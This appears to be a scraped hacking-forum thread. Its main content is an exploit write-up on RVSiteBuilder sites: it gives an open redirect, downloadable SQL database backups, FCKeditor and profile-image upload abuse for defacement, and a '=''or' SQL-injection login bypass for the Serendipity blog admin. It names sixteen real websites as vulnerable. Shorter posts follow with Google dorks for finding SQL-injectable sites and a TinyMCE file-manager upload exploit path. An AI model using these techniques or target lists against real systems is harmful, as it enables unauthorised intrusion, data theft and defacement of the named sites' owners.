/usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi Fatal error: Class 'SGL_FrontController' not found in /home/DOMAINADDRESS/public_html/rvsindex.php on line 20 #################################################################################################### PATH => TARGET/ComponentAndUserFramework.php Please edit /home2/DOMAINADDRESS/public_html/php.ini change include_path to include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php" # PATH for View Homepage => TARGET/rvsindex.php #################################################################################################### # PATH RevSiteBuilder Admin Login Control Panel => TARGET/admin or this is the Admin Panel way => /rvsindex.php?/user/login/ # PATH Admin Panel Login WordPress => TARGET/wp-login.php?redirect_to=http%3A%2F%2FDOMAINADDRESS%2F%2Fwp-admin%2F&reauth=1 # PATH Admin Panel Login Joomla => TARGET/administrator # PATH Admin Panel Login osCommerce => TARGET/admin # PATH Admin Panel Login OpenCart => TARGET/admin Note : Some RVSiteBuilder websites uses wordpress and joomla but all files belongs to revsitebuilder and rvglobalsoft software. It is totally weird vulnerability. They have path like TARGET/blogweb or TARGET/osc But some sites gives this error. Sometimes it asks for username and password. Please contact your provider edit file php.ini change include_path to include_path = ".:/usr/lib/php:/usr/local/lib/php" save file and restart apache #################################################################################################### # PATH for Uploaded Documents => TARGET/documents/ #################################################################################################### # PATH for JS JQuery-Ui Demos and Documents [ View Original Sources ] => TARGET/js/jquery-ui/demos/ and TARGET/js/jquery-ui/docs/ # You can view => Interactions - Widgets ~ Effects ~ About jQuery UI ~ Theming - View Sources #################################################################################################### # PATH for JQuery Tests Version => TARGET/js/jquery-ui/tests/ #################################################################################################### # PATH for Themes Codes => TARGET/js/jquery-ui/themes/base/ and TARGET/js/themes/ #################################################################################################### # PATH jscalendar-1.0 "It is happening again" => TARGET/js/jscalendar/ => The Coolest DHTML Calendar - Online Demo #################################################################################################### # PATH Changelog Last Changes => TARGET/js/scriptaculous/CHANGELOG #################################################################################################### # PATH Learn Version => TARGET/js/scriptaculous/VERSION #################################################################################################### # PATH for Optimizer => TARGET/optimizer.php Please edit /home2/DOMAIN/public_html/php.ini change include_path to include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php" #################################################################################################### # Other Paths that gives same error => #TARGET/rvsMasterCompoDB.php #TARGET/rvsStaticWeb.php #TARGET/rvscommonfunc.php #TARGET/rvssetup.php Please edit /home2/DOMAIN/public_html/php.ini change include_path to include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php" #################################################################################################### #QuickForm tutorial example - *Enter your name: #/scripts/rvslib/Pear/quickFormTest.php #/themes/default/default/testForms.html #################################################################################################### #{if:adminApprove} {adminApprove} #/themes/rvtheme/authweb/authPage.html #################################################################################################### #{foreach:aFaqData,key,aValue} {if:aValue.category_name} #/themes/rvtheme/faqweb/viewFaqWeb.html ################################################################################################### #{if:forumsInstall} - Search for forums #TARGET/themes/rvtheme/forums/blocksearch.html #################################################################################################### # Testing forms # /themes/default/testForms.php ################################################################################################# # RevSiteBuilder RVGlobalSoft Open Redirection Vulnerability # TARGET/login => It automatically redirects to this URL Link here => /rvsindex.php?/user/login/action/login # Open Redirection Page /rvsindex.php?/user/login/redir/ANY-DOMAIN-ADRESS ################################################################################################# # {translate(pageTitle)} Contactus # /themes/rvtheme/main/contactMail.html ################################################################################################# #{translate(#Please enter your name and e-mail address and select the newsletters that you want to subscribe.#)} #/themes/rvtheme/newsletter/authorize.html #/themes/rvtheme/newsletter/list.html #/themes/rvtheme/newsletter/uikit_list.html ################################################################################################# #RVTheme Admin Area and Users useable Login Paths => #/themes/rvtheme/user/account.html #/themes/rvtheme/user/accountSummary.html #/themes/rvtheme/user/blockLogin.html #/themes/rvtheme/user/blockLogout.html #/themes/rvtheme/user/horizontalBlockLogin.html #/themes/rvtheme/user/loginForgot.html #/themes/rvtheme/user/prefUserEdit.html #/themes/rvtheme/user/profile.html #/themes/rvtheme/user/uikit_login.html #/themes/rvtheme/user/uikit_loginForgot.html #/themes/rvtheme/user/uikit_prefUserEdit.html #/themes/rvtheme/user/uikit_userAddUseCompoDB.html #/themes/rvtheme/user/uikit_userPasswordEdit.html #/themes/rvtheme/user/userAdd.html #/themes/rvtheme/user/userAddUseCompoDB.html #/themes/rvtheme/user/userPasswordEdit.html #/themes/rvtheme/user/verticalBlockLogin.html #/themes/rvtheme_admin/articleweb/admin_articleEdit.html #/themes/rvtheme_admin/articleweb/admin_articleManager.html #/themes/rvtheme_admin/articleweb/admin_articleTypeEdit.html #/themes/rvtheme_admin/articleweb/admin_articleTypeManager.html #/themes/rvtheme_admin/faqweb/admin_faqCategoryEdit.html #/themes/rvtheme_admin/faqweb/admin_faqWebEdit.html #/themes/rvtheme_admin/faqweb/admin_faqWebManager.html #/themes/rvtheme_admin/css/ ##################################################################################################### #Learn Version of the RVSiteBuilder and RVGlobalSoft => TARGET/version.txt ##################################################################################################### #Flash Player Version Detection => TARGET/Scripts/AC_RunActiveContent.js ##################################################################################################### Getting started with Seagull Project => [ Seagull PHP Framework - © Seagull Systems 2003-2007 ] /rvsindex.php?/default/masterLayout/layout-navtop-3col.css/ ##################################################################################################### # RevSiteBuilder SQL Injection Vulnerability => #Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be compatible with SGL_OutputRendererStrategy::initEngine() in /usr/local/lib/php/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89 #Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible with SGL_OutputRendererStrategy::render($view) in /usr/local/lib/php/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89 #Warning: include(SGL_PATH/lib/SGL/FrontController.php): failed to open stream: No such file or directory in /home/DOMAINADDRESS/public_html/wysiwyg/fckeditor/editor/filemanager/connectors/php/config.php on line 264 ################################################################################################# # What You See Is What You Get [ WYSIWYG ] Exploiter => # WYSIWYG FCKeditor Arbitrary File Upload Vulnerability and Exploit # Exploit => ..../wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html # Example Site => /images/.... # Allowed File Extensions => .txt .png .gif .jpg .xml # Sometimes Wysiwyg Editor Gives this error when trying upload a file to the server Please contact your host provider ssh as root to server and run. For cpanel pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi For directadmin pear install -f /usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi Tutorial '' How to download RVsiteBuilder package file manually ? '' For cPanel -------------------- SSH to your cPanel server as root and run command cd /usr/local/cpanel/whostmgr/docroot/cgi/ rm -rf /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/ rm -f rvsitebuilderinstaller.tar wget http://download.rvglobalsoft.com/rvsitebuilderinstaller.tar tar -xvf rvsitebuilderinstaller.tar rm -f rvsitebuilderinstaller.tar mkdir /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages cd /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar tar -xvf scriptdownloadpackage.tar /usr/local/cpanel/3rdparty/bin/php scriptdownloadpackage.php Once complete download file manually, please follow the instruction in this link. https://www.rvsitebuilder.com/installation/ -------------------- For DirectAdmin -------------------- SSH to your cPanel server as root and run command cd /usr/local/rvglobalsoft/rvsitebuilderinstaller/packages wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar tar -xvf scriptdownloadpackage.tar php scriptdownloadpackage.php Once complete download file manually, please follow the instruction in this link. https://www.rvsitebuilder.com/installation/ Reference => rvglobalsoft.com/knowledgebase/article/148/how-to-download-rvsitebuilder-package-file-manually/ Reference => rvskin.com/rvlogin/rvloginssh ################################################################################################## # RevSiteBuilder Arbitrary File Database DB Backup .sql Download Vulnerability # TARGET/rvsDbBackup.sql => OR download and view SQL Database Backup Files => TARGET/rvsUtf8Backup/rvsDbBackup.sql # View RevSiteBuilder Page Data Backup => TARGET/rvsUtf8Backup/rvsPageData.sql # Example Site DB Backup View => archive.is/Demkr ################################################################################################### 1) Register yourself to the site TARGET/rvsindex.php?/user/register/ It says => You have successfully been registered. Please check your email for confirmation of your password. Note : Confirm your registration in order to proceed. Sometimes RVSiteBuilder and RVGlobalsoft gives you a new password or you choose your password while registration. Pay attention : When you register choose your nickname carefully because it is important. It says => Activation is successfully. Please login. 2) Login to the User Interface => TARGET/rvsindex.php?/user/login/action/login 3) You can use Account - User Preference - User Password Change Area /rvsindex.php?/user/account/action/viewProfile/ /rvsindex.php?/user/account/ /rvsindex.php?/user/userpreference/ /rvsindex.php?/user/userpassword/action/edit/ 4) Go to your Profile like this => TARGET/rvsindex.php?/user/account/action/viewProfile/ Edit these Values Choose Image Upload => Allowed File Extensions ( jpg,gif,bmp,png,txt,html) It says => Your profile details have been successfully updated PATH : /themes/rvtheme/images/YOURNİCKNAME. Note : Your chosen nickname is important while registration. Upload your html or txt file but do not put like this .yournickname.html Just . [ dot ] is important here. You will see your index on that site. ################################################################################################# # Serendipity RevSiteBuilder Blog Administration # /blogweb/serendipity_admin.php # Username : '=''or' # Password : '=''or' # You can use for both of them as '' admin '' '' admin '' # /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect # /blogweb/serendipity_admin_image_selector.php?serendipity[htmltarget]=img_icon&serendipity[filename_only]=true # /blogweb/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect # /blogweb/serendipity_admin.php?serendipity[adminModule]=personal # /blogweb/uploads/yourfilename.rar # Solution for Serendipity Blog Administration # To mitigate this issue please upgrade at least to version 2.0.2: # Download Link : https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip # Please note that a newer version might already be available. ################################################################################################# How to Install RVsitebuilder for Hosting Provider [ Bugs Fixation ] Check every folder and limit with .htaccess cPanel ssh to your server as root and install plugin 'RVglobalsoft manager' by run following shell command: cd /usr/src; rm -fv rvsitebuilderinstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderinstall.sh; chmod +x rvsitebuilderinstall.sh; ./rvsitebuilderinstall.sh Login to WHM as root. Go to WHM > Plugins > and run RVglobalsoft manager then follow simple install process. Configure plugin for your panel. It's all done! RVsitebuilder is ready to use for all your users. DirectAdmin ssh to your server as "root" and install plugin 'RVglobalsoft manager' by run following shell command: cd /usr/src; rm -fv rvsitebuilderdainstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderdainstall.sh; chmod +x rvsitebuilderdainstall.sh; ./rvsitebuilderdainstall.sh For DirectAdmin panel with PHP version 5.5 only (If your panel is lower version of PHP, skip to step 3) 2.1 Run the following command to make RVsitebuilder compatible with PHP 5.5: perl /usr/local/directadmin/plugins/rvsitebuilderinstaller/admin/installphpda.pl 2.2 Run the following command to make RVseagullmod compatible with PHP 5.5: perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi --force=rvseagullmod Open file 'directadmin.conf' that located in: usr/local/directadmin/conf/directadmin.conf and change the value of 'numservers' from 5 to 15 Go to Directadmin > Admin level > and run 'RVsitebuilder Admin' then follow simple install process. Login to DirectAdmin as "admin" and Configure plugin on your panel. RVsitebuilder in DirectAdmin plugins cannot configure hosting plans but you can set plans in user level by RVsitebuilder Admin Go to Directadmin > Admin level > open RVsitebuilder Admin and configure in 'User Control List' or 'Reseller Control List.' ################################################################################################# RVSiteBuilder Last Changes and Bugs Fixation Reports [ Changelog ] => rvsitebuilder.com/changelog/ RVSiteBuilder Installation => rvsitebuilder.com/installation/ RVSiteBuilder and RVGlobalSoft Tutorials => rvsitebuilder.com/tutorials/ ~ rvglobalsoft.com/installation/ ~ documentation.cpanel.net/display/68Docs/Installation+Guide ################################################################################################## # Example Vulnerable Sites => 1) bevstop.com 2) ecologichouse.ro 3) delta-izoterm.com 4) smoke911ga.com 5) hoofin-about.co.uk 6) rkdzns.com 7) promotionalsinc.com 8) collegewear.com.ng 9) freezerman.co.uk 10) guntechtips.com 11) apaivaconstruction.com 12) dmoment.com.my 13) elvisonuora.com.ng 14) plattevillebaptist.org 15) voicesinharmony.ca 16) graysongraphics.us ################################################################################################# # Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team 2012 - 2018
  10. mohammad_ghazei

    Hacking-Penetration testing to the site

    Dork: intext:''Дизайн: «Чипса» Разработка сайта: weltgroup'' site:ru - intext:''Разработка сайта Weltgroup'' site:ru sql injection hosting :)))
  11. mohammad_ghazei

    Hacking-Penetration testing to the site

    Dork: intext:''Desgined By Catpops Technobiz'' - intext:''Designed By Catpops Technobiz'' sql injection
  12. mohammad_ghazei

    Hacking-Penetration testing to the site

    # Dork: inurl:"index.php?scelta=campi" sql injection
  13. mohammad_ghazei

    Hacking-Penetration testing to the site

    # Google Dork: inurl:/dipnotpanel/js/tinymce/plugins/fileman # Exploit: /dipnotpanel/js/tinymce/plugins/fileman/php/upload.php # Access the site with /dipnotpanel/js/tinymce/plugins/fileman/Uploads/file.jpg
  14. mohammad_ghazei

    Hacking-Penetration testing to the site

    "Design & Developed By Seawind Solution Pvt. Ltd." SQL Injection Vulnerability
  15. mohammad_ghazei

    Hacking-Penetration testing to the site

    intext:''Design by Christian Bernal - Development by Monoattack'' site:ec SQL Injection Vulnerability